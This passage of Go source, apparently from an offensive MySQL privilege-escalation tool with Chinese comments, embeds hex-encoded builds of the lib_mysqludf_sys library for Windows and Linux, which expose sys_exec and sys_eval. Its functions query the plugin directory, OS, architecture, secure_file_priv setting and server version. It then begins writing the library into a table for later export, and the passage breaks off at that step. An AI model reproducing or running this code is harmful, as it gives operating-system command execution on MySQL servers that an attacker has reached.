075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E0000000000000000000000002CB20000ECB1000000000000000000000000000039B200001CB20000000000000000000000000000000000000000000044B200000000000052B200000000000062B200000000000072B200000000000080B200000000000000000000000000008EB200000000000000000000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C46726565000000667265650000000000000000A727A15A0000000074B30000010000001200000012000000C0B2000008B3000050B300007010000060100000001000008015000060100000701500002014000060100000901300000014000060100000901300003011000060100000C010000000130000E0120000A011000089B300009FB30000BCB30000D7B30000E3B30000F6B3000007B4000010B4000020B400002EB4000037B4000047B4000055B400005DB400006CB4000079B4000081B4000090B4000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
 13 | var Linux32dll = "0x7F454C4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000F80E0000F80E00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000D0000000D0000000060000000400000051E5746400000000000000000000000000000000000000000600000004000000250000002A0000001400000008000000270000001D0000000000000000000000030000000000000011000000000000000A0000002900000012000000200000000000000000000000260000000C0000002100000017000000230000000D000000000000000E0000001C000000150000000000000006000000000000000000000010000000220000000F0000002400000019000000180000000000000000000000000000000000000000000000000000001A0000000200000013000000050000000000000000000000000000000000000000000000000000001F00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000B00000000000000000000000000000000000000000000001E0000001B0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019C7C9BDA4080390046083130000001500000016000000180000001A0000001C0000001F00000021000000000000002200000000000000230000002400000026000000280000002900000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED871581CC1E2F7DEA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF36AC68AE3B9FD4A0AC73D1C525681B320B5911FEAB5FBE1200000000000000000000000000000000E7000000000000008D00000012000000C2000000000000005C00000012000000BA00000000000000E7040000120000000100000000000000000000002000000025000000000000000000000020000000ED000000000000007E02000012000000AB01000000000000150100001200000079010000000000007D00000012000000C700000000000000C600000012000000F50000000000000071010000120000009E01000000000000FB00000012000000CF00000000000000700000001200000010010000000000002500000012000000E0000000000000008901000012000000B500000000000000A80200001200000016000000000000000B0100002200000088010000000000007400000012000000FB00000000000000230000001200000080010000040D00006100000012000B00750000003B0A00000500000012000B0010000000F80D00000000000012000C003F010000A10C00002500000012000B001F010000100900000000000012000900C301000008110000000000001000F1FF96000000470A00000500000012000B0070010000EE0C00001600000012000B00CF01000010110000000000001000F1FF56000000310A00000500000012000B00020100009C0B00003000000012000B00A30100007D0D00003E00000012000B00390000002C0A00000500000012000B00320100006B0C00003600000012000B00BC01000008110000000000001000F1FF65000000360A00000500000012000B0025010000FC0B00006F00000012000B0085000000400A00000700000012000B0017010000CC0B00003000000012000B0055010000C60C00002800000012000B00A90000004C0A00008800000012000B008F010000650D00001800000012000B00D7000000D40A0000C800000012000B00005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F6765745F6465696E6974007379735F657865635F6465696E6974007379735F6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C00666F726B00737973636F6E66006D6D6170007374726E6370790077616974706964007379735F6576616C006D616C6C6F6300706F70656E007265616C6C6F630066676574730070636C6F7365007379735F6576616C5F696E697400737472637079007379735F657865635F696E6974007379735F7365745F696E6974007379735F6765745F696E6974006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F657865630073797374656D007379735F73657400736574656E76007379735F7365745F6465696E69740066726565007379735F67657400676574656E76006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E312E3300474C4942435F322E3000474C4942435F322E310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300B20100001000000000000000731F690900000400D4010000100000001069690D00000300E0010000100000001169690D00000200EA01000000000000040B000008000000B70B000008000000E70B000008000000110C000008000000220C000008000000550C0000080000008E0C000008000000AC0C000008000000D90C00000800000004110000080000006B0A0000020F00007C0A000002030000960A000002020000AD0A000002090000430B000002090000BC0A0000020C0000E40A0000020E0000F30A0000020E00003F0C0000020E00000E0B000002010000310B000002060000560B0000020A0000680B000002120000BF0B0000020D0000EF0B0000020D00005B0C0000020D0000960C0000020D0000B20C0000020D0000E10C0000020D0000FD0C000002080000580D000002110000770D0000020B00008E0D000002070000E410000006040000E810000006050000EC10000006100000FC1000000704000000110000071000005589E55383EC04E8000000005B81C3D40700008B93F4FFFFFF85D27405E81E000000E8B9000000E884040000585BC9C3FFB304000000FFA30800000000000000FFA30C0000006800000000E9E0FFFFFFFFA3100000006808000000E9D0FFFFFF5589E55653E8AD00000081C37607000083EC1080BB1800000000755D8B83FCFFFFFF85C0740E8B8314000000890424E8BCFFFFFF8B8B1C0000008D831CFFFFFF8D9318FFFFFF29D0C1F8028D70FF39F173208DB6000000008D410189831C000000FF948318FFFFFF8B8B1C00000039F172E6C683180000000183C4105B5E5DC35589E553E82E00000081C3F706000083EC048B9320FFFFFF85D274158B93F8FFFFFF85D2740B8D8320FFFFFF890424FFD283C4045B5DC38B1C24C3905589E55DC35589E55DC35589E55DC35589E55DC35531C089E55DC35589E55DC35589E557565383EC0CFC83C9FF8B750C8B46088B3831C0F2AEF7D18D59FFE8FCFFFFFF83F8007C53753F83EC0C6A1EE8FCFFFFFF5F596A006A00486A218D1418F7D06A0721D0506A00E8FCFFFFFF83C42083F8FF89C7742351538B4608FF3057E8FCFFFFFFFFD7EB0B526A016A0050E8FCFFFFFF31C083C410EB05B8010000008D65F45B5E5F5DC35589E557565383EC18FC6800040000E8FCFFFFFFC70424010000008945E8E8FCFFFFFFC6000089C68B450C595B31DB68840E00008B4008FF30E8FCFFFFFF8945ECEB338B7DE831C083C9FFF2AE5252F7D18D79FF8D043B50568945F0E8FCFFFFFF83C40C57FF75E889C68D041850E8FCFFFFFF8B5DF083C40CFF75EC6A04FF75E8E8FCFFFFFF83C41085C075B683EC0CFF75ECE8FCFFFFFF83C410803E0075088B4518C60001EB16C6441EFF0031C083C9FF89F7F2AE8B4514F7D14989088D65F489F05B5E5F5DC35589E583EC088B450C833801750A8B400431D28338007414505068140E0000FF7510E8FCFFFFFFB20183C41088D0C9C35589E583EC088B450C833801750A8B400431D28338007414505068140E0000FF7510E8FCFFFFFFB20183C41088D0C9C35589E55383EC048B550C8B5D10833A0274095050683F0E0000EB428B420483380074095050685E0E0000EB318B520C83EC0CC74004000000008B0283C00203420450E8FCFFFFFF8B550883C41089420C31D285C07512505068860E000053E8FCFFFFFFB20183C41088D08B5DFCC9C35589E583EC088B450C83380175128B4004833800750A8B4508C6000131C0EB14505068140E0000FF7510E8FCFFFFFFB00183C410C9C35589E55383EC0C8B5D1068A00E000053E8FCFFFFFF8B4514C7001E00000089D88B5DFCC9C35531D289E583EC088B450C8338007414525268BF0E0000FF7510E8FCFFFFFFB20183C41088D0C9C35589E583EC148B450C8B4008FF30E8FCFFFFFFC999C35589E557565383EC10FC8B550C8B45088B580C8B420C89DF8B088D440B018945E88B42088B30F3A48B420C8B00C60403008B42088B4A0C8B7DE88B70048B4904F3A48B420C8B55E88B4004C60402006A015253E8FCFFFFFF8D65F45B5E5F5D99C35589E58B45088B400C85C074098945085DE9FCFFFFFF5DC35589E55783EC10FC8B450C8B4008FF30E8FCFFFFFF83C41085C089C275088B4518C60001EB1131C083C9FF89D7F2AE8B4514F7D149890889D08B7DFCC9C390909090905589E55653E85DFCFFFF81C3260300008B8310FFFFFF83F8FF74198DB310FFFFFF8DB4260000000083EE04FFD08B0683F8FF75F45B5E5DC35589E55383EC04E8000000005B81C3EC020000E860FBFFFF595BC9C345787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D657465720045787065637465642065786163746C792074776F20617267756D656E747300457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E34004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF00000000FFFFFFFF000000000000000001000000B20100000C000000100900000D000000F80D000004000000B4000000F5FEFF6FF8010000050000005805000006000000B80200000A000000F40100000B0000001000000003000000F010000002000000100000001400000011000000170000000009000011000000E0070000120000002001000013000000080000001600000000000000FEFFFF6FA0070000FFFFFF6F01000000F0FFFF6F4C070000FAFFFF6F0A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000141000000000000000000000560900006609000004110000004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200002E7368737472746162002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C2E64796E002E72656C2E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E64796E616D6963002E676F74002E676F742E706C74002E64617461002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000F0000000500000002000000B4000000B400000044010000030000000000000004000000040000000B000000F6FFFF6F02000000F8010000F8010000C000000003000000000000000400000004000000150000000B00000002000000B8020000B8020000A0020000040000000100000004000000100000001D00000003000000020000005805000058050000F40100000000000000000000010000000000000025000000FFFFFF6F020000004C0700004C070000540000000300000000000000020000000200000032000000FEFFFF6F02000000A0070000A00700004000000004000000010000000400000000000000410000000900000002000000E0070000E007000020010000030000000000000004000000080000004A0000000900000002000000000900000009000010000000030000000A0000000400000008000000530000000100000006000000100900001009000030000000000000000000000004000000000000004E000000010000000600000040090000400900003000000000000000000000000400000004000000590000000100000006000000700900007009000088040000000000000000000010000000000000005F0000000100000006000000F80D0000F80D00001C00000000000000000000000400000000000000650000000100000032000000140E0000140E0000DD000000000000000000000001000000010000006D0000000100000002000000F40E0000F40E00000400000000000000000000000400000000000000770000000100000003000000001000000010000008000000000000000000000004000000000000007E000000010000000300000008100000081000000800000000000000000000000400000000000000850000000100000003000000101000001010000004000000000000000000000004000000000000008A00000006000000030000001410000014100000D000000004000000000000000400000008000000930000000100000003000000E4100000E41000000C00000000000000000000000400000004000000980000000100000003000000F0100000F01000001400000000000000000000000400000004000000A1000000010000000300000004110000041100000400000000000000000000000400000000000000A7000000080000000300000008110000081100000800000000000000000000000400000000000000AC000000010000000000000000000000081100009B0000000000000000000000010000000000000001000000030000000000000000000000A3110000B500000000000000000000000100000000000000"
 14 | var Linux64dll = "0x7F454C4602010100000000000000000003003E0001000000D00C0000000000004000000000000000E8180000000000000000000040003800050040001A00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050E57464040000006412000000000000641200000000000064120000000000009C000000000000009C00000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002B0000001500000005000000280000001E000000000000000000000006000000000000000C00000000000000070000002A00000009000000210000000000000000000000270000000B0000002200000018000000240000000E00000000000000040000001D0000001600000000000000130000000000000000000000120000002300000010000000250000001A0000000F000000000000000000000000000000000000001B00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000A00000011000000000000000000000000000000000000000D0000002600000017000000000000000800000000000000000000000000000000000000000000001F0000001C0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119C4C93DA4400398046883140000001600000017000000190000001B0000001D0000002000000022000000000000002300000000000000240000002500000027000000290000002A00000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED871581CC1E2F7DEA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF36AC68AE3B9FD4A0AC73D1C525681B320B5911FEAB5FBE120000000000000000000000000000000000000000000000000000000003000900A00B0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000E0000000120000000000000000000000DE01000000000000790100001200000000000000000000007700000000000000BA0000001200000000000000000000003504000000000000F5000000120000000000000000000000C2010000000000009E010000120000000000000000000000D900000000000000FB000000120000000000000000000000050000000000000016000000220000000000000000000000FE00000000000000CF000000120000000000000000000000AD00000000000000880100001200000000000000000000008000000000000000AB010000120000000000000000000000250100000000000010010000120000000000000000000000DC00000000000000C7000000120000000000000000000000C200000000000000B5000000120000000000000000000000CC02000000000000ED000000120000000000000000000000E802000000000000E70000001200000000000000000000009B00000000000000C200000012000000000000000000000028000000000000008001000012000B007A100000000000006E000000000000007500000012000B00A70D00000000000001000000000000001000000012000C00781100000000000000000000000000003F01000012000B001A100000000000002D000000000000001F01000012000900A00B0000000000000000000000000000C30100001000F1FF881720000000000000000000000000009600000012000B00AB0D00000000000001000000000000007001000012000B0066100000000000001400000000000000CF0100001000F1FF981720000000000000000000000000005600000012000B00A50D00000000000001000000000000000201000012000B002E0F0000000000002900000000000000A301000012000B00F71000000000000041000000000000003900000012000B00A40D00000000000001000000000000003201000012000B00EA0F0000000000003000000000000000BC0100001000F1FF881720000000000000000000000000006500000012000B00A60D00000000000001000000000000002501000012000B00800F0000000000006A000000000000008500000012000B00A80D00000000000003000000000000001701000012000B00570F00000000000029000000000000005501000012000B0047100000000000001F00000000000000A900000012000B00AC0D0000000000009A000000000000008F01000012000B00E8100000000000000F00000000000000D700000012000B00460E000000000000E800000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F6765745F6465696E6974007379735F657865635F6465696E6974007379735F6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C00666F726B00737973636F6E66006D6D6170007374726E6370790077616974706964007379735F6576616C006D616C6C6F6300706F70656E007265616C6C6F630066676574730070636C6F7365007379735F6576616C5F696E697400737472637079007379735F657865635F696E6974007379735F7365745F696E6974007379735F6765745F696E6974006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F657865630073797374656D007379735F73657400736574656E76007379735F7365745F6465696E69740066726565007379735F67657400676574656E76006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100B20100001000000000000000751A690900000200D401000000000000801720000000000008000000000000008017200000000000D01620000000000006000000020000000000000000000000D81620000000000006000000030000000000000000000000E016200000000000060000000A00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000A00000000000000000000003817200000000000070000000B00000000000000000000004017200000000000070000000C00000000000000000000004817200000000000070000000D00000000000000000000005017200000000000070000000E00000000000000000000005817200000000000070000000F00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883EC08E827010000E8C2010000E88D0500004883C408C3FF35320B2000FF25340B20000F1F4000FF25320B20006800000000E9E0FFFFFFFF252A0B20006801000000E9D0FFFFFFFF25220B20006802000000E9C0FFFFFFFF251A0B20006803000000E9B0FFFFFFFF25120B20006804000000E9A0FFFFFFFF250A0B20006805000000E990FFFFFFFF25020B20006806000000E980FFFFFFFF25FA0A20006807000000E970FFFFFFFF25F20A20006808000000E960FFFFFFFF25EA0A20006809000000E950FFFFFFFF25E20A2000680A000000E940FFFFFFFF25DA0A2000680B000000E930FFFFFFFF25D20A2000680C000000E920FFFFFFFF25CA0A2000680D000000E910FFFFFFFF25C20A2000680E000000E900FFFFFFFF25BA0A2000680F000000E9F0FEFFFF00000000000000004883EC08488B05F50920004885C07402FFD04883C408C390909090909090909055803D900A2000004889E5415453756248833DD809200000740C488B3D6F0A2000E812FFFFFF488D05130820004C8D2504082000488B15650A20004C29E048C1F803488D58FF4839DA73200F1F440000488D4201488905450A200041FF14C4488B153A0A20004839DA72E5C605260A2000015B415CC9C3660F1F8400000000005548833DBF072000004889E57422488B05530920004885C07416488D3DA70720004989C3C941FFE30F1F840000000000C9C39090C3C3C3C331C0C3C341544883C9FF4989F455534883EC10488B4610488B3831C0F2AE48F7D1488D69FFE8B6FEFFFF83F80089C77C61754FBF1E000000E803FEFFFF488D70FF4531C94531C031FFB921000000BA07000000488D042E48F7D64821C6E8AEFEFFFF4883F8FF4889C37427498B4424104889EA4889DF488B30E852FEFFFFFFD3EB0CBA0100000031F6E802FEFFFF31C0EB05B8010000005A595B5D415CC34157BF00040000415641554531ED415455534889F34883EC1848894C24104C89442408E85AFDFFFFBF010000004989C6E84DFDFFFFC600004889C5488B4310488D356A030000488B38E814FEFFFF4989C7EB374C89F731C04883C9FFF2AE4889EF48F7D1488D59FF4D8D641D004C89E6E8DDFDFFFF4A8D3C284889DA4C89F64D89E54889C5E8A8FDFFFF4C89FABE080000004C89F7E818FDFFFF4885C075B44C89FFE82BFDFFFF807D0000750A488B442408C60001EB1F42C6442DFF0031C04883C9FF4889EFF2AE488B44241048F7D148FFC94889084883C4184889E85B5D415C415D415E415FC34883EC08833E014889D7750B488B460831D2833800740E488D353A020000E817FDFFFFB20188D05EC34883EC08833E014889D7750B488B460831D2833800740E488D3511020000E8EEFCFFFFB20188D05FC3554889FD534889D34883EC08833E027409488D3519020000EB3F488B46088338007409488D3526020000EB2DC7400400000000488B4618488B384883C70248037808E801FCFFFF31D24885C0488945107511488D351F0200004889DFE887FCFFFFB20141585B88D05DC34883EC08833E014889F94889D77510488B46088338007507C6010131C0EB0E488D3576010000E853FCFFFFB0014159C34154488D35EF0100004989CC4889D7534889D34883EC08E832FCFFFF49C704241E0000004889D8415A5B415CC34883EC0831C0833E004889D7740E488D35D5010000E807FCFFFFB001415BC34883EC08488B4610488B38E862FBFFFF5A4898C34883EC28488B46184C8B4F104989F2488B08488B46104C89CF488B004D8D4409014889C6F3A44C89C7498B4218488B0041C6040100498B4210498B5218488B4008488B4A08BA010000004889C6F3A44C89C64C89CF498B4218488B400841C6040000E867FBFFFF4883C4284898C3488B7F104885FF7405E912FBFFFFC3554889CD534C89C34883EC08488B4610488B38E849FBFFFF4885C04889C27505C60301EB1531C04883C9FF4889D7F2AE48F7D148FFC948894D00595B4889D05DC39090909090909090554889E5534883EC08488B05C80320004883F8FF7419488D1DBB0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E86FFBFFFF4883C408C345787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D657465720045787065637465642065786163746C792074776F20617267756D656E747300457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E34004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F290000011B033B980000001200000040FBFFFFB400000041FBFFFFCC00000042FBFFFFE400000043FBFFFFFC00000044FBFFFF1401000047FBFFFF2C01000048FBFFFF44010000E2FBFFFF6C010000CAFCFFFFA4010000F3FCFFFFBC0100001CFDFFFFD401000086FDFFFFF4010000B6FDFFFF0C020000E3FDFFFF2C02000002FEFFFF4402000016FEFFFF5C02000084FEFFFF7402000093FEFFFF8C0200001400000000000000017A5200017810011B0C070890010000140000001C00000084FAFFFF01000000000000000000000014000000340000006DFAFFFF010000000000000000000000140000004C00000056FAFFFF01000000000000000000000014000000640000003FFAFFFF010000000000000000000000140000007C00000028FAFFFF030000000000000000000000140000009400000013FAFFFF01000000000000000000000024000000AC000000FCF9FFFF9A00000000420E108C02480E18410E20440E3083048603000000000034000000D40000006EFAFFFFE800000000420E10470E18420E208D048E038F02450E28410E30410E38830786068C05470E50000000000000140000000C0100001EFBFFFF2900000000440E100000000014000000240100002FFBFFFF2900000000440E10000000001C0000003C01000040FBFFFF6A00000000410E108602440E188303470E200000140000005C0100008AFBFFFF3000000000440E10000000001C00000074010000A2FBFFFF2D00000000420E108C024E0E188303470E2000001400000094010000AFFBFFFF1F00000000440E100000000014000000AC010000B6FBFFFF1400000000440E100000000014000000C4010000B2FBFFFF6E00000000440E300000000014000000DC01000008FCFFFF0F00000000000000000000001C000000F4010000FFFBFFFF4100000000410E108602440E188303470E2000000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF000000000000000000000000000000000100000000000000B2010000000000000C00000000000000A00B0000000000000D00000000000000781100000000000004000000000000005801000000000000F5FEFF6F00000000A00200000000000005000000000000006807000000000000060000000000000060030000000000000A00000000000000E0010000000000000B0000000000000018000000000000000300000000000000E81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200A0000000000000700000000000000C0090000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000A009000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000004809000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000CE0B000000000000DE0B000000000000EE0B000000000000FE0B0000000000000E0C0000000000001E0C0000000000002E0C0000000000003E0C0000000000004E0C0000000000005E0C0000000000006E0C0000000000007E0C0000000000008E0C0000000000009E0C000000000000AE0C000000000000BE0C0000000000008017200000000000004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200002E7368737472746162002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E64796E616D6963002E676F74002E676F742E706C74002E64617461002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000B000000F6FFFF6F0200000000000000A002000000000000A002000000000000C000000000000000030000000000000008000000000000000000000000000000150000000B00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001D00000003000000020000000000000068070000000000006807000000000000E00100000000000000000000000000000100000000000000000000000000000025000000FFFFFF6F020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000FEFFFF6F0200000000000000A009000000000000A009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000C009000000000000C00900000000000060000000000000000300000000000000080000000000000018000000000000004B000000040000000200000000000000200A000000000000200A0000000000008001000000000000030000000A0000000800000000000000180000000000000055000000010000000600000000000000A00B000000000000A00B000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000B80B000000000000B80B00000000000010010000000000000000000000000000040000000000000010000000000000005B000000010000000600000000000000D00C000000000000D00C000000000000A80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000E000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000DD000000000000000000000000000000010000000000000001000000000000006F000000010000000200000000000000641200000000000064120000000000009C000000000000000000000000000000040000000000000000000000000000007D000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008E000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009A000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000A3000000010000000300000000000000D016200000000000D0160000000000001800000000000000000000000000000008000000000000000800000000000000A8000000010000000300000000000000E816200000000000E8160000000000009800000000000000000000000000000008000000000000000800000000000000B1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000B7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000BC000000010000000000000000000000000000000000000088170000000000009B000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000C500000000000000000000000000000001000000000000000000000000000000"
 15 | 
 16 | // 获取pplugin路径
 17 | func get_plugin(conn *sql.DB) (plugin_path string) {
 18 | 	Info("获取Plugin路径")
 19 | 	plugin, err := MysqlCMD("show variables like '%plugin%';", conn)
 20 | 	if err != nil {
 21 | 		Err(err)
 22 | 	}
 23 | 
 24 | 	if len(plugin) == 0 {
 25 | 		Info("不存在plugin_dir")
 26 | 	} else {
 27 | 		for i, a := range plugin {
 28 | 			if a["Variable_name"] == "plugin_dir" {
 29 | 				plugin_path = fmt.Sprintf("%v", plugin[i]["Value"])
 30 | 				Info(fmt.Sprintf("Plugin路径为：%s", plugin_path))
 31 | 			} else {
 32 | 				Info("不存在plugin_dir值,默认将dll导出为C:\\Windows\\System32\\")
 33 | 				plugin_path = ""
 34 | 			}
 35 | 		}
 36 | 	}
 37 | 	return plugin_path
 38 | }
 39 | 
 40 | // 获取系统信息
 41 | func get_compile(conn *sql.DB) (compile_version_string string, versioncompilemachine_value string) {
 42 | 	Info("获取主机版本及架构")
 43 | 	compile, err := MysqlCMD("show variables like '%compile%';", conn)
 44 | 	if err != nil {
 45 | 		Err(err)
 46 | 	}
 47 | 
 48 | 	versioncompilemachine_value = fmt.Sprintf("%s", compile[0]["Value"])
 49 | 
 50 | 	for i, j := range compile {
 51 | 		if j["Variable_name"] == "version_compile_os" {
 52 | 			compile_version := compile[i]["Value"]
 53 | 			compile_version_string = fmt.Sprintf("%s", compile_version)
 54 | 			Info(fmt.Sprintf("主机系统为：%v", compile_version_string))
 55 | 		}
 56 | 	}
 57 | 	return compile_version_string, versioncompilemachine_value
 58 | }
 59 | 
 60 | // 获取secur_file_priv信息
 61 | func get_secure_file_priv(conn *sql.DB) (secure_file_priv string, result bool) {
 62 | 	Info("判断是否存在secure_file_priv")
 63 | 	m, err := MysqlCMD("SHOW VARIABLES LIKE '%secure%';", conn)
 64 | 	if err != nil {
 65 | 		//Err(err)
 66 | 		Info("执行show variables like '%secure%'出错")
 67 | 		os.Exit(1)
 68 | 	}
 69 | 	for i, Variable := range m {
 70 | 		// Check the Variable_name field of each map
 71 | 		if Variable["Variable_name"] == "secure_file_priv" {
 72 | 			// fmt.Println("Variable found!")
 73 | 			result = true
 74 | 			secure_file_priv = fmt.Sprintf("%s", m[i]["Value"])
 75 | 		} else {
 76 | 			result = false
 77 | 		}
 78 | 	}
 79 | 	return secure_file_priv, result
 80 | }
 81 | 
 82 | func get_version(conn *sql.DB) (v float64) {
 83 | 	m, err := MysqlCMD("select @@version;", conn)
 84 | 	s := fmt.Sprintf("%s", m[0]["@@version"])
 85 | 	parts1 := strings.Split(s, ".")
 86 | 	version := fmt.Sprintf("%s.%s", parts1[0], parts1[1])
 87 | 	v, err = strconv.ParseFloat(version, 64)
 88 | 	if err != nil {
 89 | 		fmt.Println(err)
 90 | 	}
 91 | 
 92 | 	return v
 93 | }
 94 | 
 95 | // udf提权具体步骤
 96 | func Detail(conn *sql.DB, plugin_path string, dll string, udfname string, databasename string) {
 97 | 	v := get_version(conn)
 98 | 	Info("拼接dll数据")
 99 | 	_, err0 := MysqlCMD(fmt.Sprintf("update %s.temp set data=concat(\"\",%s);", databasename, dll), conn)
100 | 	if err0 != nil {
